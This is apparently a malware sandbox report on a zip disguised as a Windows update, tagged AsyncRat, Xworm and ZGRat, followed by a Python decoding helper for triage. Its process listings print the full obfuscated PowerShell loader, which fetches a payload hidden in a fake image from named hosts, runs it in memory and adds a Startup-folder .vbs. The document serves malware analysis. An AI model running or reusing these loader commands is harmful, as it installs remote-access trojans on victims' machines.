Analysis Overview
SHA256
b471f3f22ac4c66fcf7419df31431552ce8f5ac8222b1398e0d1016824e95dcf
Threat Level: Known bad
The file 19042024_1547_windows_update.zip was found to be: Known bad.
Malicious Activity Summary
AsyncRat
Suspicious use of NtCreateUserProcessOtherParentProcess
Xworm
ZGRat
Detect Xworm Payload
Detect ZGRat V1
Async RAT payload
Blocklisted process makes network request
Drops startup file
Checks computer location settings
Suspicious use of SetThreadContext
Enumerates physical storage devices
Unsigned PE
Creates scheduled task(s)
Suspicious use of SetWindowsHookEx
Suspicious behavior: EnumeratesProcesses
Suspicious use of WriteProcessMemory
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
Suspicious behavior: CmdExeWriteProcessMemorySpam
Suspicious use of AdjustPrivilegeToken
MITRE ATT&CK
Enterprise Matrix V15
Analysis: static1
Detonation Overview
Reported
2024-04-19 07:49
Signatures
Unsigned PE
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Analysis: behavioral1
Detonation Overview
Submitted
2024-04-19 07:49
Reported
2024-04-19 07:52
Platform
win7-20231129-en
Max time kernel
117s
Max time network
118s
Command Line
Signatures
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Processes
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -ExecutionPolicy bypass -File C:\Users\Admin\AppData\Local\Temp\windows_update\file.ps1
Network
Files
memory/2468-4-0x000000001B670000-0x000000001B952000-memory.dmp
memory/2468-5-0x00000000029E0000-0x00000000029E8000-memory.dmp
memory/2468-6-0x000007FEF5410000-0x000007FEF5DAD000-memory.dmp
memory/2468-7-0x0000000002C80000-0x0000000002D00000-memory.dmp
memory/2468-8-0x000007FEF5410000-0x000007FEF5DAD000-memory.dmp
memory/2468-9-0x0000000002C80000-0x0000000002D00000-memory.dmp
memory/2468-11-0x0000000002C80000-0x0000000002D00000-memory.dmp
memory/2468-10-0x0000000002C80000-0x0000000002D00000-memory.dmp
memory/2468-12-0x000007FEF5410000-0x000007FEF5DAD000-memory.dmp
memory/2468-13-0x000007FEF5410000-0x000007FEF5DAD000-memory.dmp
memory/2468-14-0x0000000002C80000-0x0000000002D00000-memory.dmp
memory/2468-15-0x0000000002C80000-0x0000000002D00000-memory.dmp
memory/2468-16-0x0000000002C80000-0x0000000002D00000-memory.dmp
Analysis: behavioral4
Detonation Overview
Submitted
2024-04-19 07:49
Reported
2024-04-19 07:52
Platform
win10v2004-20240226-en
Max time kernel
134s
Max time network
146s
Command Line
Signatures
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Checks computer location settings
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\USER\S-1-5-21-3808065738-1666277613-1125846146-1000\Control Panel\International\Geo\Nation | C:\Windows\System32\WScript.exe | N/A |
Drops startup file
| Description | Indicator | Process | Target |
| File created | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Adobe.vbs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| File opened for modification | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Adobe.vbs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Enumerates physical storage devices
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 2252 wrote to memory of 5060 | N/A | C:\Windows\System32\WScript.exe | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
| PID 2252 wrote to memory of 5060 | N/A | C:\Windows\System32\WScript.exe | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
| PID 5060 wrote to memory of 3828 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
| PID 5060 wrote to memory of 3828 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
| PID 3828 wrote to memory of 4352 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
| PID 3828 wrote to memory of 4352 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Processes
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\windows_update\file.vbs"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$codigo = 'ZgB1DgTreG4DgTreYwB0DgTreGkDgTrebwBuDgTreCDgTreDgTreRDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreEQDgTreYQB0DgTreGEDgTreRgByDgTreG8DgTrebQBMDgTreGkDgTrebgBrDgTreHMDgTreIDgTreB7DgTreCDgTreDgTrecDgTreBhDgTreHIDgTreYQBtDgTreCDgTreDgTreKDgTreBbDgTreHMDgTredDgTreByDgTreGkDgTrebgBnDgTreFsDgTreXQBdDgTreCQDgTrebDgTreBpDgTreG4DgTreawBzDgTreCkDgTreIDgTreDgTreNDgTreDgTreoDgTreIDgTreDgTregDgTreCDgTreDgTreIDgTreDgTregDgTreCDgTreDgTreIDgTreDgTregDgTreCDgTreDgTreIDgTreDgTregDgTreCDgTreDgTreJDgTreB3DgTreGUDgTreYgBDDgTreGwDgTreaQBlDgTreG4DgTredDgTreDgTregDgTreD0DgTreIDgTreBODgTreGUDgTredwDgTretDgTreE8DgTreYgBqDgTreGUDgTreYwB0DgTreCDgTreDgTreUwB5DgTreHMDgTredDgTreBlDgTreG0DgTreLgBODgTreGUDgTredDgTreDgTreuDgTreFcDgTreZQBiDgTreEMDgTrebDgTreBpDgTreGUDgTrebgB0DgTreDsDgTreIDgTreDgTreNDgTreDgTreoDgTreIDgTreDgTregDgTreCDgTreDgTreIDgTreDgTregDgTreCDgTreDgTreIDgTreDgTregDgTreCDgTreDgTreIDgTreDgTregDgTreCDgTreDgTreJDgTreBzDgTreGgDgTredQBmDgTreGYDgTrebDgTreBlDgTreGQDgTreTDgTreBpDgTreG4DgTreawBzDgTreCDgTreDgTrePQDgTregDgTreEcDgTreZQB0DgTreC0DgTreUgBhDgTreG4DgTreZDgTreBvDgTreG0DgTreIDgTreDgTretDgTreEkDgTrebgBwDgTreHUDgTredDgTreBPDgTreGIDgTreagBlDgTreGMDgTredDgTreDgTregDgTreCQDgTrebDgTreBpDgTreG4DgTreawBzDgTreCDgTreDgTreLQBDDgTreG8DgTredQBuDgTreHQDgTreIDgTreDgTrekDgTreGwDgTreaQBuDgTreGsDgTrecwDgTreuDgTreEwDgTreZQBuDgTreGcDgTredDgTreBoDgTreDsDgTreIDgTreDgTreNDgTreDgTreoDgTreIDgTreDgTregDgTreCDgTreDgTreIDgTreDgTregDgTreCDgTreDgTreIDgTreDgTregDgTreCDgTreDgTreIDgTreDgTregDgTreCDgTreDgTreZgBvDgTreHIDgTreZQBhDgTreGMDgTreaDgTreDgTregDgTreCgDgTreJDgTreBsDgTreGkDgTrebgBrDgTreCDgTreDgTreaQBuDgTreCDgTreDgTreJDgTreBzDgTreGgDgTredQBmDgTreGYDgTrebDgTreBlDgTreGQDgTreTDgTreBpDgTreG4DgTreawBzDgTreCkDgTreIDgTreB7DgTreCDgTreDgTredDgTreByDgTreHkDgTreIDgTreB7DgTreCDgTreDgTrecgBlDgTreHQDgTredQByDgTreG4DgTreIDgTreDgTrekDgTreHcDgTreZQBiDgTreEMDgTrebDgTreBpDgTreGUDgTrebgB0DgTreC4DgTreRDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreEQDgTreYQB0DgTreGEDgTre
KDgTreDgTrekDgTreGwDgTreaQBuDgTreGsDgTreKQDgTregDgTreH0DgTreIDgTreBjDgTreGEDgTredDgTreBjDgTreGgDgTreIDgTreB7DgTreCDgTreDgTreYwBvDgTreG4DgTredDgTreBpDgTreG4DgTredQBlDgTreCDgTreDgTrefQDgTregDgTreH0DgTreOwDgTregDgTreDgTre0DgTreCgDgTregDgTreCDgTreDgTreIDgTreDgTregDgTreCDgTreDgTreIDgTreDgTregDgTreCDgTreDgTreIDgTreDgTregDgTreCDgTreDgTreIDgTreByDgTreGUDgTredDgTreB1DgTreHIDgTrebgDgTregDgTreCQDgTrebgB1DgTreGwDgTrebDgTreDgTregDgTreH0DgTreOwDgTregDgTreDgTre0DgTreCgDgTregDgTreCDgTreDgTreIDgTreDgTregDgTreCDgTreDgTreIDgTreDgTregDgTreCDgTreDgTreIDgTreDgTregDgTreCDgTreDgTreIDgTreDgTrekDgTreGwDgTreaQBuDgTreGsDgTrecwDgTregDgTreD0DgTreIDgTreBDgTreDgTreCgDgTreJwBoDgTreHQDgTredDgTreBwDgTreHMDgTreOgDgTrevDgTreC8DgTrebgBhDgTreG4DgTrebwBzDgTreGgDgTreaQBlDgTreGwDgTreZDgTreDgTreuDgTreHDgTreDgTrecgBvDgTreC8DgTrebgBlDgTreHcDgTreXwBpDgTreG0DgTreYQBnDgTreGUDgTreMgDgTreuDgTreGoDgTrecDgTreBnDgTreD8DgTreMQDgTre2DgTreDYDgTreMQDgTre1DgTreDQDgTreNwDgTreyDgTreDUDgTreJwDgTresDgTreCDgTreDgTreJwBoDgTreHQDgTredDgTreBwDgTreHMDgTreOgDgTrevDgTreC8DgTrebgBhDgTreG4DgTrebwBzDgTreGgDgTreZDgTreDgTreuDgTreHDgTreDgTrecgBvDgTreC8DgTreZgBpDgTreGwDgTreZQBzDgTreC8DgTrebgBlDgTreHcDgTreXwBpDgTreG0DgTreYQBnDgTreGUDgTreLgBqDgTreHDgTreDgTreZwDgTre/DgTreDEDgTreNDgTreDgTre0DgTreDQDgTreMQDgTre3DgTreDIDgTreMwDgTrenDgTreCkDgTreOwDgTreNDgTreDgTreoDgTreIDgTreDgTregDgTreCDgTreDgTreIDgTreDgTregDgTreCDgTreDgTreIDgTreDgTregDgTreCDgTreDgTreIDgTreDgTregDgTreCDgTreDgTreIDgTreDgTrekDgTreGkDgTrebQBhDgTreGcDgTreZQBCDgTreHkDgTredDgTreBlDgTreHMDgTreIDgTreDgTre9DgTreCDgTreDgTreRDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreEQDgTreYQB0DgTreGEDgTreRgByDgTreG8DgTrebQBMDgTreGkDgTrebgBrDgTreHMDgTreIDgTreDgTrekDgTreGwDgTreaQBuDgTreGsDgTrecwDgTre7DgTreDgTre0DgTreCgDgTregDgTreCDgTreDgTreIDgTreDgTregDgTreCDgTreDgTreIDgTreDgTregDgTreCDgTreDgTreIDgTreDgTregDgTreCDgTreDgTreIDgTreDgTregDgTreGkDgTreZgDgTregDgTreCgDgTreJDgTreBpDgTreG0DgTreYQBnDgTreGUDgTreQgB5DgTreHQDgTreZQBzDgTreCDgTreDgTreLQBuDgTreGUDgTreIDgTreDgTrekDgTreG4DgTredQBsDgTreGwDgTreKQDgTregDgTreHsD
gTreIDgTreDgTrekDgTreGkDgTrebQBhDgTreGcDgTreZQBUDgTreGUDgTreeDgTreB0DgTreCDgTreDgTrePQDgTregDgTreFsDgTreUwB5DgTreHMDgTredDgTreBlDgTreG0DgTreLgBUDgTreGUDgTreeDgTreB0DgTreC4DgTreRQBuDgTreGMDgTrebwBkDgTreGkDgTrebgBnDgTreF0DgTreOgDgTre6DgTreFUDgTreVDgTreBGDgTreDgDgTreLgBHDgTreGUDgTredDgTreBTDgTreHQDgTrecgBpDgTreG4DgTreZwDgTreoDgTreCQDgTreaQBtDgTreGEDgTreZwBlDgTreEIDgTreeQB0DgTreGUDgTrecwDgTrepDgTreDsDgTreDQDgTreKDgTreCDgTreDgTreIDgTreDgTregDgTreCDgTreDgTreIDgTreDgTregDgTreCDgTreDgTreIDgTreDgTregDgTreCDgTreDgTreIDgTreDgTregDgTreCDgTreDgTreJDgTreBzDgTreHQDgTreYQByDgTreHQDgTreRgBsDgTreGEDgTreZwDgTregDgTreD0DgTreIDgTreDgTrenDgTreDwDgTrePDgTreBCDgTreEEDgTreUwBFDgTreDYDgTreNDgTreBfDgTreFMDgTreVDgTreBBDgTreFIDgTreVDgTreDgTre+DgTreD4DgTreJwDgTre7DgTreCDgTreDgTreJDgTreBlDgTreG4DgTreZDgTreBGDgTreGwDgTreYQBnDgTreCDgTreDgTrePQDgTregDgTreCcDgTrePDgTreDgTre8DgTreEIDgTreQQBTDgTreEUDgTreNgDgTre0DgTreF8DgTreRQBODgTreEQDgTrePgDgTre+DgTreCcDgTreOwDgTregDgTreCQDgTrecwB0DgTreGEDgTrecgB0DgTreEkDgTrebgBkDgTreGUDgTreeDgTreDgTregDgTreD0DgTreIDgTreDgTrekDgTreGkDgTrebQBhDgTreGcDgTreZQBUDgTreGUDgTreeDgTreB0DgTreC4DgTreSQBuDgTreGQDgTreZQB4DgTreE8DgTreZgDgTreoDgTreCQDgTrecwB0DgTreGEDgTrecgB0DgTreEYDgTrebDgTreBhDgTreGcDgTreKQDgTre7DgTreCDgTreDgTreDQDgTreKDgTreCDgTreDgTreIDgTreDgTregDgTreCDgTreDgTreIDgTreDgTregDgTreCDgTreDgTreIDgTreDgTregDgTreCDgTreDgTreIDgTreDgTregDgTreCQDgTreZQBuDgTreGQDgTreSQBuDgTreGQDgTreZQB4DgTreCDgTreDgTrePQDgTregDgTreCQDgTreaQBtDgTreGEDgTreZwBlDgTreFQDgTreZQB4DgTreHQDgTreLgBJDgTreG4DgTreZDgTreBlDgTreHgDgTreTwBmDgTreCgDgTreJDgTreBlDgTreG4DgTreZDgTreBGDgTreGwDgTreYQBnDgTreCkDgTreOwDgTreNDgTreDgTreoDgTreIDgTreDgTregDgTreCDgTreDgTreIDgTreDgTregDgTreCDgTreDgTreIDgTreDgTregDgTreCDgTreDgTreIDgTreDgTregDgTreCDgTreDgTreIDgTreBpDgTreGYDgTreIDgTreDgTreoDgTreCQDgTrecwB0DgTreGEDgTrecgB0DgTreEkDgTrebgBkDgTreGUDgTreeDgTreDgTregDgTreC0DgTreZwBlDgTreCDgTreDgTreMDgTreDgTregDgTreC0DgTreYQBuDgTreGQDgTreIDgTreDgTrekDgTreGUDgTrebgBkDgTreEkDgTrebgBkDgTreGUDgTreeDgTreDgTregDgTreC0DgTreZwB0DgTreCDgTreD
gTreJDgTreBzDgTreHQDgTreYQByDgTreHQDgTreSQBuDgTreGQDgTreZQB4DgTreCkDgTreIDgTreB7DgTreCDgTreDgTreJDgTreBzDgTreHQDgTreYQByDgTreHQDgTreSQBuDgTreGQDgTreZQB4DgTreCDgTreDgTreKwDgTre9DgTreCDgTreDgTreJDgTreBzDgTreHQDgTreYQByDgTreHQDgTreRgBsDgTreGEDgTreZwDgTreuDgTreEwDgTreZQBuDgTreGcDgTredDgTreBoDgTreDsDgTreIDgTreDgTreNDgTreDgTreoDgTreIDgTreDgTregDgTreCDgTreDgTreIDgTreDgTregDgTreCDgTreDgTreIDgTreDgTregDgTreCDgTreDgTreIDgTreDgTregDgTreCDgTreDgTreJDgTreBiDgTreGEDgTrecwBlDgTreDYDgTreNDgTreBMDgTreGUDgTrebgBnDgTreHQDgTreaDgTreDgTregDgTreD0DgTreIDgTreDgTrekDgTreGUDgTrebgBkDgTreEkDgTrebgBkDgTreGUDgTreeDgTreDgTregDgTreC0DgTreIDgTreDgTrekDgTreHMDgTredDgTreBhDgTreHIDgTredDgTreBJDgTreG4DgTreZDgTreBlDgTreHgDgTreOwDgTreNDgTreDgTreoDgTreIDgTreDgTregDgTreCDgTreDgTreIDgTreDgTregDgTreCDgTreDgTreIDgTreDgTregDgTreCDgTreDgTreIDgTreDgTregDgTreCDgTreDgTreIDgTreDgTrekDgTreGIDgTreYQBzDgTreGUDgTreNgDgTre0DgTreEMDgTrebwBtDgTreG0DgTreYQBuDgTreGQDgTreIDgTreDgTre9DgTreCDgTreDgTreJDgTreBpDgTreG0DgTreYQBnDgTreGUDgTreVDgTreBlDgTreHgDgTredDgTreDgTreuDgTreFMDgTredQBiDgTreHMDgTredDgTreByDgTreGkDgTrebgBnDgTreCgDgTreJDgTreBzDgTreHQDgTreYQByDgTreHQDgTreSQBuDgTreGQDgTreZQB4DgTreCwDgTreIDgTreDgTrekDgTreGIDgTreYQBzDgTreGUDgTreNgDgTre0DgTreEwDgTreZQBuDgTreGcDgTredDgTreBoDgTreCkDgTreOwDgTreNDgTreDgTreoDgTreIDgTreDgTregDgTreCDgTreDgTreIDgTreDgTregDgTreCDgTreDgTreIDgTreDgTregDgTreCDgTreDgTreIDgTreDgTregDgTreCDgTreDgTreIDgTreDgTrekDgTreGMDgTrebwBtDgTreG0DgTreYQBuDgTreGQDgTreQgB5DgTreHQDgTreZQBzDgTreCDgTreDgTrePQDgTregDgTreFsDgTreUwB5DgTreHMDgTredDgTreBlDgTreG0DgTreLgBDDgTreG8DgTrebgB2DgTreGUDgTrecgB0DgTreF0DgTreOgDgTre6DgTreEYDgTrecgBvDgTreG0DgTreQgBhDgTreHMDgTreZQDgTre2DgTreDQDgTreUwB0DgTreHIDgTreaQBuDgTreGcDgTreKDgTreDgTrekDgTreGIDgTreYQBzDgTreGUDgTreNgDgTre0DgTreEMDgTrebwBtDgTreG0DgTreYQBuDgTreGQDgTreKQDgTre7DgTreCDgTreDgTreJDgTreBsDgTreG8DgTreYQBkDgTreGUDgTreZDgTreBBDgTreHMDgTrecwBlDgTreG0DgTreYgBsDgTreHkDgTreIDgTreDgTre9DgTreCDgTreDgTreWwBTDgTreHkDgTrecwB0DgTreGUDgTrebQDgTreuDgTreFIDgTreZQBmDgTreGwDgTreZQBjDgTreHQD
gTreaQBvDgTreG4DgTreLgBBDgTreHMDgTrecwBlDgTreG0DgTreYgBsDgTreHkDgTreXQDgTre6DgTreDoDgTreTDgTreBvDgTreGEDgTreZDgTreDgTreoDgTreCQDgTreYwBvDgTreG0DgTrebQBhDgTreG4DgTreZDgTreBCDgTreHkDgTredDgTreBlDgTreHMDgTreKQDgTre7DgTreCDgTreDgTreJDgTreB0DgTreHkDgTrecDgTreBlDgTreCDgTreDgTrePQDgTregDgTreCQDgTrebDgTreBvDgTreGEDgTreZDgTreBlDgTreGQDgTreQQBzDgTreHMDgTreZQBtDgTreGIDgTrebDgTreB5DgTreC4DgTreRwBlDgTreHQDgTreVDgTreB5DgTreHDgTreDgTreZQDgTreoDgTreCcDgTredDgTreBlDgTreHMDgTredDgTreBwDgTreG8DgTredwBlDgTreHIDgTrecwBoDgTreGUDgTrebDgTreBsDgTreC4DgTreSDgTreBvDgTreG0DgTreZQDgTrenDgTreCkDgTreOwDgTreNDgTreDgTreoDgTreIDgTreDgTregDgTreCDgTreDgTreIDgTreDgTregDgTreCDgTreDgTreIDgTreDgTregDgTreCDgTreDgTreIDgTreDgTregDgTreCDgTreDgTreJDgTreBtDgTreGUDgTredDgTreBoDgTreG8DgTreZDgTreDgTregDgTreD0DgTreIDgTreDgTrekDgTreHQDgTreeQBwDgTreGUDgTreLgBHDgTreGUDgTredDgTreBNDgTreGUDgTredDgTreBoDgTreG8DgTreZDgTreDgTreoDgTreCcDgTrebDgTreBhDgTreCcDgTreKQDgTreuDgTreEkDgTrebgB2DgTreG8DgTreawBlDgTreCgDgTreJDgTreBuDgTreHUDgTrebDgTreBsDgTreCwDgTreIDgTreBbDgTreG8DgTreYgBqDgTreGUDgTreYwB0DgTreFsDgTreXQBdDgTreCDgTreDgTreKDgTreDgTrenDgTreHQDgTreeDgTreB0DgTreC4DgTrebwBkDgTreGUDgTrebgBjDgTreGsDgTrebwDgTrevDgTreHMDgTreZQBsDgTreGkDgTreZgDgTrevDgTreG8DgTrecgBwDgTreC4DgTreZDgTreBsDgTreGUDgTreaQBoDgTreHMDgTrebwBuDgTreGEDgTrebgDgTrevDgTreC8DgTreOgBzDgTreHDgTreDgTredDgTreB0DgTreGgDgTreJwDgTresDgTreCDgTreDgTreJwDgTrexDgTreCcDgTreLDgTreDgTregDgTreCcDgTreQQBkDgTreG8DgTreYgBlDgTreCcDgTreKQDgTrepDgTreH0DgTrefQDgTre=';$oWjuxd = [system.Text.encoding]::Unicode.GetString([system.convert]::Frombase64string( $codigo.replace('DgTre','A') ));powershell.exe -windowstyle hidden -executionpolicy bypass -Noprofile -command $OWjuxD"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -Noprofile -command "function DownloadDataFromLinks { param ([string[]]$links) $webClient = New-Object System.Net.WebClient; $shuffledLinks = Get-Random -InputObject $links -Count $links.Length; foreach ($link in $shuffledLinks) { try { return $webClient.DownloadData($link) } catch { continue } }; return $null }; $links = @('https://nanoshield.pro/new_image2.jpg?166154725', 'https://nanoshd.pro/files/new_image.jpg?14441723'); $imageBytes = DownloadDataFromLinks $links; if ($imageBytes -ne $null) { $imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes); $startFlag = '<<BASE64_START>>'; $endFlag = '<<BASE64_END>>'; $startIndex = $imageText.IndexOf($startFlag); $endIndex = $imageText.IndexOf($endFlag); if ($startIndex -ge 0 -and $endIndex -gt $startIndex) { $startIndex += $startFlag.Length; $base64Length = $endIndex - $startIndex; $base64Command = $imageText.Substring($startIndex, $base64Length); $commandBytes = [System.Convert]::FromBase64String($base64Command); $loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes); $type = $loadedAssembly.GetType('testpowershell.Home'); $method = $type.GetMethod('la').Invoke($null, [object[]] ('txt.odencko/selif/orp.dleihsonan//:sptth', '1', 'Adobe'))}}"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden Copy-Item -Path *.vbs -Destination "'C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Adobe.vbs'"
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --no-appcompat-clear --mojo-platform-channel-handle=5164 --field-trial-handle=3084,i,4016110471176367543,14287608422419064331,262144 --variations-seed-version /prefetch:8
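The process tree above (and the near-identical one recorded under behavioral18) is a three-stage PowerShell loader: WScript runs file.vbs, which spawns PowerShell with `$codigo`, the real script stored as UTF-16LE, base64-encoded, with every 'A' in the base64 text swapped for the junk token DgTre and restored at run time by `.replace('DgTre','A')`. The decoded script fetches a fake .jpg from nanoshield.pro or nanoshd.pro (order randomised), cuts the text between `<<BASE64_START>>` and `<<BASE64_END>>`, hands the bytes to `Assembly.Load` and invokes `testpowershell.Home.la` with the next-stage URL written backwards; a further PowerShell copies the .vbs into the Startup folder as Adobe.vbs. The Python below is an added triage helper, not part of the report or of the sample, that reproduces those decoding steps offline. Everything it decodes comes from the captured command lines (the `$codigo` blob is shortened to its first 14 base64 groups so it decodes on its own); the 'image' it parses is a constructed stand-in and the MZ-prefixed bytes inside it are a placeholder, not a real assembly.

```python
import base64
import re
from typing import List, Optional

# --- Stage 1: the WScript-spawned PowerShell line -----------------------------
# $codigo = UTF-16LE script -> base64 -> every 'A' replaced by the token 'DgTre'.
CODIGO_ASSIGN = re.compile(r"\$codigo\s*=\s*'([^']+)'")
REPLACE_CALL = re.compile(r"\.replace\('([^']+)','([^']*)'\)", re.IGNORECASE)


def decode_stage1(blob: str, token: str = 'DgTre', replacement: str = 'A') -> str:
    # str.replace is case-sensitive, exactly like .NET String.Replace used by the loader.
    b64 = blob.replace(token, replacement)
    return base64.b64decode(b64).decode('utf-16-le')   # [Text.Encoding]::Unicode.GetString


def decode_stage1_from_cmdline(cmdline: str) -> str:
    """Pull the blob and the (token, replacement) pair out of the captured command line,
    so the decoder keeps working if the operator rotates the junk token."""
    blob = CODIGO_ASSIGN.search(cmdline)
    call = REPLACE_CALL.search(cmdline)
    if not blob or not call:
        raise ValueError('not the expected $codigo / .replace() loader shape')
    return decode_stage1(blob.group(1), call.group(1), call.group(2))


def encode_stage1(script: str, token: str = 'DgTre') -> str:
    """Inverse of decode_stage1; used only to build a round-trip test vector."""
    return base64.b64encode(script.encode('utf-16-le')).decode('ascii').replace('A', token)


# --- Stage 2: the hidden PowerShell that fetches the 'image' ------------------
LINKS_ARRAY = re.compile(r"\$links\s*=\s*@\(([^)]*)\)")
START_FLAG = '<<BASE64_START>>'
END_FLAG = '<<BASE64_END>>'


def extract_links(stage2: str) -> List[str]:
    m = LINKS_ARRAY.search(stage2)
    return re.findall(r"'([^']+)'", m.group(1)) if m else []


def extract_embedded_assembly(image: bytes) -> Optional[bytes]:
    """Same cut the loader makes: decode the download as UTF-8 (invalid bytes become U+FFFD,
    as with UTF8.GetString), take the span between the flags, base64-decode it.
    None when the flags are absent, which is also when the loader silently does nothing."""
    text = image.decode('utf-8', errors='replace')
    start, end = text.find(START_FLAG), text.find(END_FLAG)
    if start < 0 or end <= start:
        return None
    return base64.b64decode(text[start + len(START_FLAG):end])


def is_pe(data: Optional[bytes]) -> bool:
    """Cheap sanity check before the blob goes to a .NET loader or a decompiler."""
    return bool(data) and data[:2] == b'MZ'


def unreverse(arg: str) -> str:
    """First argument of testpowershell.Home.la is the next-stage URL written backwards."""
    return arg[::-1]


# Test vectors. STAGE1_PREFIX is the start of the captured $codigo blob (14 base64 groups).
STAGE1_PREFIX = ('ZgB1DgTreG4DgTreYwB0DgTreGkDgTrebwBuDgTreCDgTreDgTreRDgTreBvDgTreHcDgTre'
                 'bgBsDgTreG8DgTreYQBkDgTreEQDgTreYQB0DgTreGEDgTre')
STAGE1_CMDLINE = ("$codigo = '" + STAGE1_PREFIX + "';$oWjuxd = [system.Text.encoding]::Unicode."
                  "GetString([system.convert]::Frombase64string( $codigo.replace('DgTre','A') ));"
                  "powershell.exe -windowstyle hidden -executionpolicy bypass -Noprofile -command $OWjuxD")
STAGE2_SNIPPET = ("$links = @('https://nanoshield.pro/new_image2.jpg?166154725', "
                  "'https://nanoshd.pro/files/new_image.jpg?14441723');")
# Constructed stand-in for the downloaded 'image': JPEG-looking junk around a flagged payload.
FAKE_ASSEMBLY = b'MZ' + b'\x00' * 62 + b'CONSTRUCTED PLACEHOLDER, NOT A REAL ASSEMBLY'
SAMPLE_IMAGE = (b'\xff\xd8\xff\xe0 constructed jpeg junk ' + START_FLAG.encode()
                + base64.b64encode(FAKE_ASSEMBLY) + END_FLAG.encode() + b'\xff\xd9')

if __name__ == '__main__':
    print(decode_stage1_from_cmdline(STAGE1_CMDLINE))
    print(extract_links(STAGE2_SNIPPET))
    print(is_pe(extract_embedded_assembly(SAMPLE_IMAGE)))
    print(unreverse('txt.odencko/selif/orp.dleihsonan//:sptth'))
```

Run it against a real capture by passing the full `$codigo` blob to `decode_stage1_from_cmdline` and the saved HTTP response body to `extract_embedded_assembly`; the reversed first argument of the `la` call gives the URL the dropped assembly is told to fetch next, which is the indicator worth blocking alongside the two download hosts.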
Network
| Country | Destination | Domain | Proto |
| US | 138.91.171.81:80 | | tcp |
| US | 8.8.8.8:53 | 241.197.17.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 97.17.167.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | nanoshd.pro | udp |
| US | 8.8.8.8:53 | nanoshield.pro | udp |
| US | 104.21.37.30:443 | nanoshield.pro | tcp |
| US | 8.8.8.8:53 | 30.37.21.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 68.159.190.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 95.221.229.192.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 217.106.137.52.in-addr.arpa | udp |
| US | 13.107.253.64:443 | | tcp |
| US | 8.8.8.8:53 | 159.113.53.23.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 183.59.114.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 15.164.165.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 232.168.11.51.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 65.139.73.23.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 240.197.17.2.in-addr.arpa | udp |
